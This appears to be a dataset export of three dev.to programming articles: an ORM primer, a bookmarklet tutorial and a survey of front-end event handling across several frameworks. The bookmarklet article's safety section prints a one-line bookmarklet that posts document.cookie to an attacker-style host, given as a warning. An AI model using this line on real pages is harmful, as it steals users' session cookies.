712,116 | Brief Introduction to ORM | ORM (Object-Relational Mapping) in 50 words Relational databases like MySQL are not object o... | 0 | 2021-05-29T14:11:29 | https://dev.to/il3ven/brief-introduction-to-orm-5b3h | database, sql | #### ORM (Object-Relational Mapping) in 50 words
Relational databases like MySQL are not object oriented. An ORM solves this problem. It provides an abstraction layer over relational databases.
In other words, an ORM is a library that lets you create objects for your entities. For example, the entities of an ecommerce app could be Users, Orders and Products. An ORM converts these entities into tables, generates the SQL queries for you and communicates with your database.

## Example
Creating tables with one-to-many relationships in ORM is as easy as creating a class. Here one teacher teaches many courses.
```js
class Teacher {
  id: Primary_Key,
  name: String,
  age: Number,
  courses: Course[], // a one-to-many relationship is as simple as declaring an array
}
```
Inserting entries into the table is as easy as using the `new` operator.
```js
const teacher = new Teacher()
teacher.name = 'Alice'
teacher.age = 32
teacher.save()
```
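Under the hood, a call like `teacher.save()` is translated into SQL. Here is a hypothetical sketch of that translation; `toInsertSQL` is a made-up helper for illustration only (real ORMs also escape values properly and emit single-quoted SQL strings, manage connections, and map results back to objects):

```js
// Hypothetical sketch: turn an object into an INSERT statement,
// roughly what an ORM's save() does under the hood.
// Note: JSON.stringify stands in for real SQL value escaping here.
function toInsertSQL(table, obj) {
  const cols = Object.keys(obj);
  const vals = cols.map((c) => JSON.stringify(obj[c]));
  return `INSERT INTO ${table} (${cols.join(', ')}) VALUES (${vals.join(', ')});`;
}

const sql = toInsertSQL('teachers', { name: 'Alice', age: 32 });
// → INSERT INTO teachers (name, age) VALUES ("Alice", 32);
```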
### Pros of an ORM
- Modelling data is easier because instead of tables you are working with objects.
- Time is saved as fewer queries have to be written.
- Cleaner code is produced when using an ORM.
- Switching databases is easier because the database layer is abstracted away.
### Cons of an ORM
- Different ORMs have slightly different syntax and need to be learned.
- Some queries cannot be performed with an ORM and one needs to use SQL for them.
### Popular ORMs
ORMs are available in many different programming languages.
##### JavaScript
- [Sequelize](https://sequelize.org/)
- [TypeORM](https://typeorm.io/#/)
##### Python
- [SQLAlchemy](https://www.sqlalchemy.org/)
- [Django](https://www.djangoproject.com/)
##### Java
- [Hibernate](https://hibernate.org/) | il3ven |
734,133 | On bookmarklets and how to make them | Bookmarklets are bookmarks which execute javascript instead of opening a new page. They are... | 0 | 2021-06-24T09:37:51 | https://dev.to/siddharthshyniben/on-bookmarklets-and-how-to-make-them-45cd | javascript, tutorial | ### Bookmarklets are bookmarks which execute javascript instead of opening a new page. They are available in almost every browser, including Chrome, Firefox and most Chromium based browsers
They are pretty easy to make and can do almost anything JavaScript can do: inject other scripts, interact with the DOM, and so on.
## How to make a bookmarklet
That's pretty easy, just create a bookmark (using whatever method your browser has) with the following content:
```js
javascript:(() => {/* Your code goes here */})();
```
The `javascript:` part tells the browser that the bookmark is actually javascript which is to be executed.
The rest of the code is executed as normal, but you can make it an IIFE (Immediately Invoked Function Expression) so that you don't accidentally overwrite any variables already defined on the page. The code can be whatever you like, but on some sites (like GitHub) some actions (like injecting scripts) may be blocked.

<figcaption>I can't inject jQuery!!</figcaption>
Another neat trick: if the bookmarklet's code evaluates to an HTML string, the browser will overwrite the content of the current page with that HTML! (which is perfect if you want a random xkcd fetcher)
## Sharing bookmarklets
It's pretty annoying to have to copy the code for a bookmarklet you want to use, right?
Well,
- Bookmarklets are just URLs
- URLs can be added to the `href` of a link
- A link can be bookmarked (right click or drag to bookmarks bar)
So, if you want to put a shareable bookmarklet on a website, just make an `<a>` element with its `href` set to the bookmarklet code:
```html
<a href="javascript:(()=>{alert('Hello, World!'); })();">Bookmark me</a>
```
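If you generate such links from a script, the code needs URL-encoding so quotes and spaces survive the `href` attribute. A small sketch of that idea (`toBookmarklet` is a made-up helper, not a standard API):

```js
// Wrap arbitrary code in an IIFE and URL-encode it so it can be
// used as the href of a link (and therefore bookmarked).
function toBookmarklet(code) {
  return 'javascript:' + encodeURIComponent(`(() => {${code}})();`);
}

const href = toBookmarklet("alert('Hello, World!')");
```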
Unfortunately, I can't add bookmarklets over here, so here's a pen with the output:
{% codepen https://codepen.io/SiddharthShyniben/pen/XWMLvYy default-tab=html,result %}
Here are some more bookmarklets which you could use:
{% codepen https://codepen.io/SiddharthShyniben/pen/BaWgXOW %}
## Safety
Running a bookmarklet is equivalent to running a script on the page, so you have to be really careful with them.
For example, this bookmarklet could easily read cookies and post them somewhere:
```js
javascript:(() => fetch('http://cookiesnatchers.com?cookie=' + document.cookie, {method: 'POST'}))();
```
Once again, you have to be really careful about what bookmarklets do.
Thanks for reading! If you have any nice bookmarklets, please share them down below! | siddharthshyniben |
735,142 | Javascript Event Handling - Deep Dive | An unopinionated research (white) paper on front end event handling under the hood. Table... | 0 | 2021-06-22T14:00:26 | https://dev.to/nasidulislam/javascript-event-handling-deep-dive-112m | javascript, react, webpack, babel | *An unopinionated research (white) paper on front end event handling under the hood.*
## Table of Contents
- Introduction
- Overview
- Deep Dive
- [React](#react)
- [Vue](#vue)
- [Angular](#angular)
- [Svelte](#svelte)
- [jQuery - 1.6.4](#jquery)
- Resources
### Introduction
**Objective**
The article takes an impartial approach to researching event handling in various UI tools. The content is based on official documentation -- *NOT* on opinion.
**Purpose**
The purpose is to understand how the same "problem" was solved across these tools.
**What this article is NOT**
This article does not assess the pros and cons -- neither does it recommend one tool over another.
### Overview
The world of Javascript evolves at breakneck speed. For the longest time, a webpage would consist of a single, monolithic script file that handled everything - from enabling interactivity on the page to calling services and rendering content. The pattern has significant drawbacks. Monolithic architectures are difficult to scale and maintain in the long term. Especially at enterprise level, where several engineers contribute code, a monolithic architecture tends to become a spaghetti mess that is hard to debug.
The inherent nature of Javascript allows engineers to innovate over this pattern and come up with ingenious ways to tackle the drawbacks. There are many, **many**, [front end libraries and frameworks](https://github.com/collections/front-end-javascript-frameworks) out there these days, each with its own superpowers and opinionated ways of approaching the problem. As a result, modern-day developers are spoilt for choice when it comes to picking a system to build their applications.
Although the list of tools at the disposal of developers is exhaustive, not many have stood the test of time and battle. In this article, we will investigate the ones that have come out (fairly) unscathed, in an attempt to understand how they handle events.
### Deep Dive
In this section, we will deep dive into several popular, publicly available UI libraries and frameworks to investigate how they handle events. Let’s start with arguably the most popular.
<div id="react"></div>

#### Handling events in React
Event handling in React centers around [ReactBrowserEventEmitter](https://github.com/facebook/react/blob/b87aabdfe1b7461e7331abb3601d9e6bb27544bc/packages/react-dom/src/events/ReactBrowserEventEmitter.js). The very first comment in the source code does a decent job of explaining how it works.
Summary of `ReactBrowserEventEmitter` event handling:

#### Let's dive deep and break each of them down:
> --> Top-level delegation is used to trap most native browser events. This may only occur in the main thread and is the responsibility of `ReactDOMEventListener`, which is injected and can therefore support pluggable event sources. This is the only work that occurs in the main thread.
React uses event delegation to handle most of the interactive events in an application. This means when a `button` with an `onClick` handler is rendered
```
<button onClick={() => console.log('button was clicked')}>Click here</button>
```
React does not attach an event listener to the `button` node. Instead, it gets a reference to the document root where the application is rendered and [mounts](https://github.com/facebook/react/blob/8a8d973d3cc5623676a84f87af66ef9259c3937c/packages/react-dom/src/client/ReactDOMComponent.js#L225) an event listener there. **React uses a single event listener per event type** to invoke all submitted handlers within the virtual DOM. Whenever a DOM event is fired, that top-level listener initiates the actual event dispatching through the React source code, re-dispatching the event to each and every handler. This can be seen in the source code of [EventPluginHub](https://github.com/facebook/react/blob/b87aabdfe1b7461e7331abb3601d9e6bb27544bc/packages/events/EventPluginHub.js).
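The delegation idea can be sketched in plain JavaScript. This is not React's actual code, just the shape of it: a registry of handlers, and a single dispatch routine that walks up from the target. The `register`/`dispatch` names and the node objects are simplified stand-ins invented for this sketch:

```
// Simplified sketch of top-level event delegation (not React source).
const handlers = new Map(); // nodeId -> { eventType: handler }

function register(nodeId, type, fn) {
  if (!handlers.has(nodeId)) handlers.set(nodeId, {});
  handlers.get(nodeId)[type] = fn;
}

// The single "root" listener: walk up from the target, invoking
// every handler registered for this event type along the path.
function dispatch(type, targetNode, event) {
  for (let node = targetNode; node; node = node.parent) {
    const fn = handlers.get(node.id) && handlers.get(node.id)[type];
    if (fn) fn(event);
  }
}

// Usage with stand-in "nodes":
const root = { id: 'root', parent: null };
const button = { id: 'button', parent: root };
register('button', 'click', () => console.log('button clicked'));
register('root', 'click', () => console.log('bubbled to root'));
dispatch('click', button, {}); // logs "button clicked", then "bubbled to root"
```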
> --> We normalize and de-duplicate events to account for browser quirks. This may be done in the worker thread.
**React normalizes event types** so that each and every browser, regardless of its underlying engine or whether it's old or modern, will have consistent event arguments. This means that, across all browsers, devices and operating systems, a `click` event will have arguments like this
- **boolean** altKey
- **boolean** metaKey
- **boolean** ctrlKey
- **boolean** shiftKey
- **boolean** getModifierState(key)
- **number** button
- **number** buttons
- **number** clientX
- **number** clientY
- **number** pageX
- **number** pageY
- **number** screenX
- **number** screenY
- **DOMEventTarget** relatedTarget
**Further reading**: for the events supported in React, read [this](https://reactjs.org/docs/events.html#supported-events).
> --> Forward these native events (with the associated top-level type used to trap it) to `EventPluginHub`, which in turn will ask plugins if they want to extract any synthetic events.
React considers the nature of each event and categorizes them into buckets. It has dedicated plugins built to manage the events in each bucket. **Each of these plugins is in turn responsible for extracting and handling the various event types** in that bucket. For instance, the `SimpleEventPlugin` handles events implemented in common browsers such as mouse and key press events ([source](https://share.cocalc.com/share/a04c90b3eaea18961287b4f6b5c13a7df2d3f0f1/react/wstein/node_modules/react/lib/SimpleEventPlugin.js?viewer=share)) and the `ChangeEventPlugin` handles `onChange` events ([source](https://share.cocalc.com/share/a04c90b3eaea18961287b4f6b5c13a7df2d3f0f1/react/wstein/react-with-addons.js?viewer=share)). The final piece that unifies all the plugins in a single place and redirects events to each individual plugin is the `EventPluginHub`.
This opens the door for us to understand how React views events. React introduces the concept of `SyntheticEvent`, which it defines as an "*implementation of the DOM Level 3 Events API by normalizing browser quirks*". Basically, it is a **wrapper around the browser's native event object** with the same interface, and it works in identical fashion across all browsers.
For React v16 and earlier, synthetic events utilize a pooling mechanism. Pooling ensures that the same object instance is reused across multiple handlers; it is reset with new properties before each invocation and then disposed of.
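The pooling (object-reuse) idea can be sketched as follows. This is a simplified illustration, not React's `SyntheticEvent` implementation, and the function names are invented for the sketch:

```
// Simplified event pooling: reuse one object instead of allocating
// a new event wrapper per dispatch (as React <= 16 did).
const pool = [];

function getPooledEvent(type, target) {
  const e = pool.pop() || { type: null, target: null };
  e.type = type;
  e.target = target;
  return e;
}

function releaseEvent(e) {
  e.type = null;   // properties are cleared...
  e.target = null;
  pool.push(e);    // ...and the instance goes back to the pool
}
```

This reuse is why, in pooled versions of React, an event's properties could not be read asynchronously after the handler returned unless `event.persist()` was called.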
> --> The `EventPluginHub` will then process each event by annotating them with "dispatches", a sequence of listeners and IDs that care about that event.
**In the React ecosystem, a single event listener is attached at the document root for any one event-type**. Since each event type will most likely have multiple handlers, **React will accumulate the events and their handlers** ([source](https://github.com/facebook/react/blob/b87aabdfe1b7461e7331abb3601d9e6bb27544bc/packages/events/EventPropagators.js#L90)). Then, it will do relevant dispatches, which consist of event handlers and their corresponding fiber nodes. The fiber nodes are nodes in the virtual DOM tree. Fiber nodes are calculated using React’s Reconciliation algorithm, which is its “diffing” algorithm to drive updates on the page.
**Further reading**: [React Fiber Architecture](https://blog.logrocket.com/deep-dive-into-react-fiber-internals/)
**Further reading**: [React Reconciliation concept](https://reactjs.org/docs/reconciliation.html)
> --> The `EventPluginHub` then dispatches the events.
The final piece of the puzzle — **the plugin hub goes through the accumulated information and dispatches the events**, thus invoking the submitted event handlers ([source](https://github.com/facebook/react/blob/b87aabdfe1b7461e7331abb3601d9e6bb27544bc/packages/events/EventPluginUtils.js#L77)).
**Simple Demo**
Here is a simple click handler demo implementation in React --> [Link](https://codesandbox.io/s/thirsty-wildflower-57x4m?file=/src/App.js).
<div id="vue"></div>

#### Handling events in Vue
In Vue, you create a `.vue` file that contains a `script` tag to execute javascript and a `template` tag that wraps all markup (both DOM and custom elements). This is a self-contained instance of a Vue component, which can also contain a `style` tag to house the CSS.
> --> Simple DOM events handling
Vue allows developers to bind events to elements using the `v-on:<event-name>` directive, or `@<event-name>` for short, and to store the state of the application in a `data` prop. **All the event handlers are stored similarly in a `methods` prop on the same object**.
```
// App.vue
<template>
  <div id="app">
    <HelloWorld :msg="msg" />
    <button @click="greet('World', $event)">
      click here
    </button>
  </div>
</template>

<script>
import HelloWorld from "./components/HelloWorld";

export default {
  name: "App",
  components: { HelloWorld },
  data: function () {
    return { msg: "Vue" };
  },
  methods: {
    greet: function (message, $event) { this.msg = message; }
  }
};
</script>
```
The application will load with a “Hello Vue” message. When the button is clicked, the handler will set the message to “World” and a “Hello World” message will be displayed --> [REPL](https://codesandbox.io/s/vue-demo-dom-event-handler-wxces?file=/src/App.vue). It is possible to access the original DOM event by passing `$event` in from the handler reference and accessing it in the event handler.
> --> Event Modifiers
Although it is possible to access the DOM event object in the handler by simply passing it in, Vue improves developer experience by letting developers extend event handling with ‘modifiers’. This way, **Vue handles the modifiers for you instead of the developer calling them explicitly in their handlers**. Multiple modifiers can be attached by using a dot-delimited pattern. The full list of supported modifiers is as follows:
- `.stop`
- `.prevent`
- `.capture`
- `.self`
- `.once`
- `.passive`
Thus, a simple example would look like this
```
/* this will trigger the handler method only once */
<button v-on:click.stop.once="clickHandler">Click me</button>
```
Link --> [REPL](https://codesandbox.io/s/vue-demo-event-modifiers-gbqmo?file=/src/App.vue).
> --> Key Modifiers
**Vue has a feature to attach keyboard events in almost identical fashion as regular event handlers**. It supports a list of aliases with commonly attached keyboard events such as the `enter` and `tab` keys. The full list of aliases is given below:
- `.enter`
- `.tab`
- `.delete` (captures both the "Delete" and "Backspace" keys)
- `.esc`
- `.up`
- `.down`
- `.left`
- `.right`
- `.space`
A simple example would look like the following
```
<!-- only call `vm.submit()` when the `key` is `Enter` -->
<input v-on:keyup.enter="submit">
```
Link --> [REPL](https://codesandbox.io/s/vue-demo-keyboard-events-mknml?file=/src/App.vue).
> --> Custom Events
**Vue handles publishing and subscribing to custom events**. The caveat here is that every component that should listen for events should maintain an explicit list of those custom events. A simple example would look like this
```
// emit event
this.$emit('myEvent')
// bind to the event
<my-component v-on:myevent="doSomething"></my-component>
```
Unlike components and props, event names will never be used as variable or property names in JavaScript, so there’s no reason to use camelCase or PascalCase. Additionally, `v-on` event listeners inside DOM templates will be automatically transformed to lowercase (due to HTML’s case-insensitivity), so `v-on:myEvent` would become `v-on:myevent` -- making `myEvent` impossible to listen to. Vue as a framework therefore recommends kebab-case for event names.
Link --> [REPL](https://codesandbox.io/s/vue-demo-custom-events-5bbuh).
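Conceptually, `$emit` and `v-on` boil down to a subscribe/publish pair. A minimal sketch of that idea (this is not Vue's implementation; `createBus` is a made-up name):

```
// Minimal emit/listen pair: the idea behind component custom events.
function createBus() {
  const listeners = {}; // event name -> array of handlers
  return {
    $on(name, fn) {
      (listeners[name] = listeners[name] || []).push(fn);
    },
    $emit(name, payload) {
      (listeners[name] || []).forEach((fn) => fn(payload));
    },
  };
}

const bus = createBus();
bus.$on('my-event', (msg) => console.log('received:', msg));
bus.$emit('my-event', 'hello'); // logs "received: hello"
```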
<div id="angular"></div>

Angular is one of the first-generation, opinionated frameworks that focuses on building Single Page Applications (SPAs). Although it has undergone significant re-invention in recent times, it still falls short in a number of ways when compared to the more modern tools available to developers these days (some of which are discussed in this article). It is still, however, valuable to take a peek at how the framework binds and handles events.
#### Handling events in Angular (4.x and above)
Angular has a very specific syntax to bind and handle events. This syntax consists of a target event name within parentheses to the left of an equal sign, and a quoted template statement to the right ([source](https://angular.io/guide/event-binding)).
A simple example of DOM event binding and handling looks like this
```
<button (click)="onSave()">Save</button>
```
**When events are being bound, Angular configures an event handler for the target event** — it can be used with custom events as well. When either the component or the directive *raises* the event, the handler executes the *template statement*. Then, the template statement performs an action in response to the event.
**In Angular, it is possible to pass an `$event` object to the function handling the event**. The shape of the `$event` object is determined by the target event. If the event is a native DOM element event, then the `$event` object is a [DOM event object](https://developer.mozilla.org/en-US/docs/Web/Events). Let's look at a simple example ([source](https://angular.io/guide/event-binding-concepts))
```
<input
[value]="currentItem.name"
(input)="currentItem.name=$event.target.value"
/>
```
There are a couple of things happening here:
1. The code binds to the `input` event of the `<input>` element, which allows the code to listen for changes.
2. When the user makes changes, the component raises the `input` event.
3. The binding executes the statement within a context that includes the DOM event object, `$event`.
4. Angular retrieves the changed text by following the path `$event.target.value` and updates the `name` property.
If the event belongs to a directive or component, `$event` has the shape that the directive or component produces.
Link --> [REPL](https://stackblitz.com/angular/pegebmnalav?file=src%2Fapp%2Fapp.component.ts).
<div id="svelte"></div>

#### Handling events in Svelte
In Svelte, you create a `.svelte` file: a self-contained component instance with its CSS, JS and HTML, along with any custom elements that are needed.
> --> Simple DOM events handling
A simple demo for a click handler will look like the following:
```
<script>
  let name = 'world';
  function update() { name = 'Svelte'; }
</script>
<span on:click={update}>Hello { name }</span>
```
This will print `Hello world` on load, but will update to `Hello Svelte` when the user clicks on the `span` -> [REPL](https://svelte.dev/repl/af38f740da8c4733817a26328ba7d061?version=3.31.0). This is the general pattern in which DOM events such as `click`, `mousemove`, etc. are implemented in Svelte (it supports inline handlers as well).
> --> Event Modifiers
**The system allows developers to add pipe delimited modifiers to the event**, such as `preventDefault` and `stopPropagation`. The handler function is able to accept an `event` argument that also has access to these modifiers, but Svelte offers an improvement in developer experience by offering these shorthands. An example would look like the following:
```
<script>
function handleClick() { alert('This alert will trigger only once!'); }
</script>
<button on:click|once={ handleClick }>Click here</button>
```
Thus, the pattern looks like `on:<event-name>|modifier1|modifier2|...` -> [REPL](https://svelte.dev/repl/a5d264f4ace9462faf39b2a592e97295?version=3.31.0). The full list of modifiers is below ([source](https://svelte.dev/tutorial/event-modifiers)):
- `preventDefault` - calls `event.preventDefault()` before running the handler. Useful for client-side form handling
- `stopPropagation` - calls `event.stopPropagation()`, preventing the event from reaching the next element
- `passive` - improves scrolling performance on touch/wheel events (Svelte will add it automatically where it's safe to do so)
- `nonpassive` - explicitly set `passive: false`
- `capture` - fires the handler during the *capture* phase instead of the *bubbling* phase ([MDN docs](https://developer.mozilla.org/en-US/docs/Learn/JavaScript/Building_blocks/Events#event_bubbling_and_capture))
- `once` - remove the handler after the first time it runs
- `self` - only trigger handler if `event.target` is the element itself
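Under the hood, a modifier amounts to wrapping the handler before it is attached. Here is a sketch of what `once` might compile down to; this is an assumed, simplified illustration, not Svelte's actual generated code:

```
// Wrap a handler so it runs at most one time: the essence of |once.
function once(fn) {
  let called = false;
  return function (event) {
    if (called) return;   // subsequent calls are ignored
    called = true;
    return fn.call(this, event);
  };
}
```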
> --> Dispatching events
**In Svelte, a parent component can update state based on data dispatched from a child component** using a function called `createEventDispatcher`. The function allows the child component to emit a data object at a user defined key. The parent component can then do as it pleases with it -> [REPL](https://svelte.dev/repl/2212634b19314d2c9e157dffd73edd8f?version=3.31.0) (open console to see dispatched data object).
> --> Event forwarding
The caveat to component events is that they do not *bubble*. Thus, **if a parent component needs to listen for an event emitted by a deeply nested component, all the intermediate components will have to *forward* that event**. Event forwarding is achieved by adding the custom data key on each wrapper component as we traverse up the Svelte DOM. Finally, the parent component where the event needs to be handled implements a handler for it -> [REPL](https://svelte.dev/repl/49b1b14aef8f4bff8fab771394ae876c?version=3.32.3) (open console to see demo).
> --> Actions
The final piece in Svelte event handling is the implementation of `actions`. **Actions are element level functions that are useful for adding custom event handlers**. Similar to transition functions, an action function receives a `node` and some optional parameters and returns an action object. That object can have a `destroy` function, which is called when the element is unmounted -> [REPL](https://svelte.dev/repl/79f3cd81b76d42909ec69e042c74abd5?version=3.31.0) (borrowed from Svelte official resources).
**Further reading**: [Svelte official tutorials](https://svelte.dev/tutorial/basics)
**Further reading**: [Compile Svelte in your head](https://lihautan.com/compile-svelte-in-your-head-part-1/#adding-event-listeners)
<div id="jquery"></div>

#### Handling events in jQuery
The primary benefit of using jQuery is that it makes DOM traversal and manipulation quite convenient. Since most browser events initiated by users are meant to provide UI feedback, this feature comes in handy. Under the hood, jQuery uses a powerful "selector" engine called [Sizzle](https://github.com/jquery/sizzle). Sizzle is a pure JS-CSS selector engine designed to be dropped in to any host library.
Let’s look at the programming model and categories of how jQuery binds and handles events. The “source” links point to the official documentation of the APIs and contain additional information on how they work:
> --> Browser Events
Source: [Browser Events](https://api.jquery.com/category/events/browser-events/)
jQuery is able to handle the following browser events out of the box.
- `.error()`: Bind an event handler to the "error" JS event ([source](https://api.jquery.com/error/))
- `.resize()`: Bind an event handler to the "resize" JS event, or trigger the event on an element ([source](https://api.jquery.com/resize/))
- `.scroll()`: Bind an event handler to the "scroll" JS event, or trigger the event on an element ([source](https://api.jquery.com/scroll/))
> --> Document Loading
Source: [Document Loading](https://api.jquery.com/category/events/document-loading/)
jQuery provides a short list of out of the box APIs to handle events related to initial page load
- `jQuery.holdReady()`: Holds or releases the execution of jQuery's ready event ([source](https://api.jquery.com/jQuery.holdReady/))
- `jQuery.ready()`: A Promise-like object that resolves when the document is ready ([source](https://api.jquery.com/jQuery.ready/))
- `.load()`: Bind an event handler to the "load" JS event ([source](https://api.jquery.com/load-event/))
- `.ready()`: Specify a function to execute when the DOM is fully loaded ([source](https://api.jquery.com/ready/))
- `.unload()`: Bind an event handler to the "unload" JS event ([source](https://api.jquery.com/unload/))
> --> Form Events
Source: [Form Events](https://api.jquery.com/category/events/form-events/)
jQuery provides a decent list of out of the box APIs to handle commonly occurring form events
- `.blur()`: Bind an event handler to the “blur” JS event, or trigger that event on an element ([source](https://api.jquery.com/blur/))
- `.change()`: Bind an event handler to the “change” JS event, or trigger that event on an element ([source](https://api.jquery.com/change/))
- `.focus()`: Bind an event handler to the “focus” JS event, or trigger that event on an element ([source](https://api.jquery.com/focus/))
- `.focusin()`: Bind an event handler to the “focusin” JS event ([source](https://api.jquery.com/focusin/))
- `.focusout()`: Bind an event handler to the “focusout” JS event ([source](https://api.jquery.com/focusout/))
- `.select()`: Bind an event handler to the “select” JS event, or trigger that event on an element ([source](https://api.jquery.com/select/))
- `.submit()`: Bind an event handler to the “submit” JS event, or trigger that event on an element ([source](https://api.jquery.com/submit/))
> --> Keyboard Events
Source: [Keyboard Events](https://api.jquery.com/category/events/keyboard-events/)
The following are out of the box APIs provided by jQuery to handle keyboard events
- `.keydown()`: Bind an event handler to the "keydown" JS event, or trigger that event on an element ([source](https://api.jquery.com/keydown/))
- `.keypress()`: Bind an event handler to the "keypress" JS event, or trigger that event on an element ([source](https://api.jquery.com/keypress/))
- `.keyup()`: Bind an event handler to the "keyup" JS event, or trigger that event on an element ([source](https://api.jquery.com/keyup/))
> --> Mouse Events
Source: [Mouse Events](https://api.jquery.com/category/events/mouse-events/)
This is where jQuery begins to shine as far as event handling is concerned. It offers a large suite of mouse event binders out of the box for developers to use.
- `.click()`: Bind an event handler to the "click" JS event, or trigger that event on an element ([source](https://api.jquery.com/click/))
- `.dblclick()`: Bind an event handler to the "dblclick" JS event, or trigger that event on an element ([source](https://api.jquery.com/dblclick/))
- `.contextmenu()`: Bind an event handler to the "contextmenu" JS event, or trigger that event on an element ([source](https://api.jquery.com/contextmenu/))
- `.mousemove()`: Bind an event handler to the "mousemove" JS event, or trigger that event on an element ([source](https://api.jquery.com/mousemove/))
- `.mouseout()`: Bind an event handler to the "mouseout" JS event, or trigger that event on an element ([source](https://api.jquery.com/mouseout/))
- `.mouseover()`: Bind an event handler to the "mouseover" JS event, or trigger that event on an element ([source](https://api.jquery.com/mouseover/))
- `.mouseup()`: Bind an event handler to the "mouseup" JS event, or trigger that event on an element ([source](https://api.jquery.com/mouseup/))
- `.toggle()`: Bind two or more handlers to the matched elements, to be executed on alternate clicks ([source](https://api.jquery.com/toggle-event/))
- `.hover()`: Bind one or two handlers to be executed when the mouse pointer enters and leaves an element ([source](https://api.jquery.com/hover/))
- `.mousedown()`: Bind an event handler to the "mousedown" JS event, or trigger that event on an element ([source](https://api.jquery.com/mousedown/))
- `.mouseenter()`: Bind an event handler to the "mouseenter" JS event, or trigger that event on an element ([source](https://api.jquery.com/mouseenter/))
- `.mouseleave()`: Bind an event handler to the "mouseleave" JS event, or trigger that event on an element ([source](https://api.jquery.com/mouseleave/))
> --> The Event Object
Source: [Event Object](https://api.jquery.com/category/events/event-object/), [Inside Event Handling Function](https://learn.jquery.com/events/inside-event-handling-function/)
Event handlers in jQuery accept the event object as the first argument. This object exposes various properties and methods. Here is a list of the more commonly used ones:
- `event.currentTarget`: The current DOM element within the event bubbling phase ([source](https://api.jquery.com/event.currentTarget/))
- `event.target`: The DOM element that initiated the event ([source](https://api.jquery.com/event.target/))
- `event.data`: An optional data object passed to the handler when the currently executing handler was bound ([source](https://api.jquery.com/event.data/))
- `event.preventDefault()`: If this method is called, the default action of the event will not be triggered ([source](https://api.jquery.com/event.preventDefault/))
- `event.stopPropagation()`: Prevents the event from bubbling up the DOM tree, preventing any parent handlers from being notified of the event ([source](https://api.jquery.com/event.stopPropagation/))
**Note**: Information below this point is related to jQuery versions later than `1.6.4`
> --> The `.on()` Event Handler Attachment API
Source: [The `.on()` Event Handler Attachment API](https://api.jquery.com/on/)
Modern versions of jQuery provide an all-encompassing API to handle events -- `.on()`. This API is designed to bind almost all of the events listed above with a single stroke. It is the recommended way to bind events ([according to the official documentation](https://learn.jquery.com/events/handling-events/)) from jQuery 1.7 onwards. A few syntax examples can be seen below:
```
// Markup to be used for all examples that follow
<div class='outer'>
  <span class='inner'>Any content</span>
</div>
```
```
// Exhibit A: a simple click handler, targeting the inner span
$('.outer .inner').on('click', function(event) {
  console.log(event);
  alert( 'inner span was clicked!!' );
});

// Exhibit B: attaching separate handlers to different event types
$('.outer .inner').on({
  mouseenter: function() {
    console.log( 'hovered over a span' );
  },
  mouseleave: function() {
    console.log( 'mouse left a span' );
  },
  click: function() {
    console.log( 'clicked a span' );
  }
});

// Exhibit C: attaching the same handler to multiple event types
$('.outer .inner').on('click mouseenter', function() {
  console.log( 'The span was either clicked or hovered on' );
});

// Exhibit D: event delegation --> handling events for descendants that don't exist yet
$('.outer').on('click', '.inner', function() {
  console.log( 'An .inner element (even one added after binding) was clicked' );
});
```
> --> Other Event Handler Attachment APIs
Source: [Event Handler Attachment](https://api.jquery.com/category/events/event-handler-attachment/)
The `.on()` API is arguably the most popular API offered by jQuery. Apart from it, jQuery ships with other interfaces that provide a useful suite of functionality out of the box. The following is a list of the most commonly occurring ones:
- `one()`: Attach a handler to an event for the elements. The handler is executed at most once per element per event type ([source](https://api.jquery.com/one/))
- `off()`: Remove an event handler ([source](https://api.jquery.com/off/))
- `trigger()`: Execute all handlers and behaviors attached to the matched elements for the given event type ([source](https://api.jquery.com/trigger/))
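As a mental model, `one()` behaves like a handler that detaches itself after its first run. A plain-JavaScript sketch of that idea (the emitter below is invented for illustration; it is not jQuery source):

```javascript
// The core idea behind one(): wrap the handler so it removes itself
// after the first invocation.
function createEmitter() {
  const handlers = [];
  const api = {
    on(fn) { handlers.push(fn); },
    one(fn) {
      const wrapper = (...args) => {
        api.off(wrapper); // detach before running, like jQuery's one()
        fn(...args);
      };
      api.on(wrapper);
    },
    off(fn) {
      const i = handlers.indexOf(fn);
      if (i !== -1) handlers.splice(i, 1);
    },
    trigger(...args) { handlers.slice().forEach((fn) => fn(...args)); },
  };
  return api;
}

const emitter = createEmitter();
let calls = 0;
emitter.one(() => { calls += 1; });
emitter.trigger('click');
emitter.trigger('click');
console.log(calls); // logs 1
```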
### Resources
- [List of front end JS frameworks](https://github.com/collections/front-end-javascript-frameworks)
- React
- [ReactBrowserEventEmitter](https://github.com/facebook/react/blob/b87aabdfe1b7461e7331abb3601d9e6bb27544bc/packages/react-dom/src/events/ReactBrowserEventEmitter.js)
- [ReactDOMComponent](https://github.com/facebook/react/blob/8a8d973d3cc5623676a84f87af66ef9259c3937c/packages/react-dom/src/client/ReactDOMComponent.js)
- [Synthetic Events](https://reactjs.org/docs/events.html#supported-events)
- [EventPluginHub](https://github.com/facebook/react/blob/b87aabdfe1b7461e7331abb3601d9e6bb27544bc/packages/events/EventPluginHub.js)
- [SimpleEventPlugin](https://share.cocalc.com/share/a04c90b3eaea18961287b4f6b5c13a7df2d3f0f1/react/wstein/node_modules/react/lib/SimpleEventPlugin.js?viewer=share)
- [ChangeEventPlugin](https://share.cocalc.com/share/a04c90b3eaea18961287b4f6b5c13a7df2d3f0f1/react/wstein/react-with-addons.js?viewer=share)
- [EventPropagators](https://github.com/facebook/react/blob/b87aabdfe1b7461e7331abb3601d9e6bb27544bc/packages/events/EventPropagators.js)
- [EventPluginUtils](https://github.com/facebook/react/blob/b87aabdfe1b7461e7331abb3601d9e6bb27544bc/packages/events/EventPluginUtils.js)
- [Reconciliation Algorithm](https://reactjs.org/docs/reconciliation.html)
- [React Fiber Architecture](https://blog.logrocket.com/deep-dive-into-react-fiber-internals/)
- Svelte
- [Svelte official tutorials](https://svelte.dev/tutorial/basics)
- [Compile Svelte in your head](https://lihautan.com/compile-svelte-in-your-head-part-1/#adding-event-listeners)
- Vue
- [Event handling](https://vuejs.org/v2/guide/events.html)
- [Event Modifiers](https://vuejs.org/v2/guide/events.html#Event-Modifiers)
- [Keyboard Events](https://vuejs.org/v2/guide/events.html#Key-Modifiers)
- [Custom Events](https://vuejs.org/v2/guide/components-custom-events.html)
- Angular
- [Event handling](https://angular.io/guide/event-binding)
- [Event binding concepts](https://angular.io/guide/event-binding-concepts)
- jQuery
- [Sizzle](https://github.com/jquery/sizzle)
- [Browser Events](https://api.jquery.com/category/events/browser-events/)
- [Document Loading](https://api.jquery.com/category/events/document-loading/)
- [Form Events](https://api.jquery.com/category/events/form-events/)
- [Keyboard Events](https://api.jquery.com/category/events/keyboard-events/)
- [Mouse Events](https://api.jquery.com/category/events/mouse-events/)
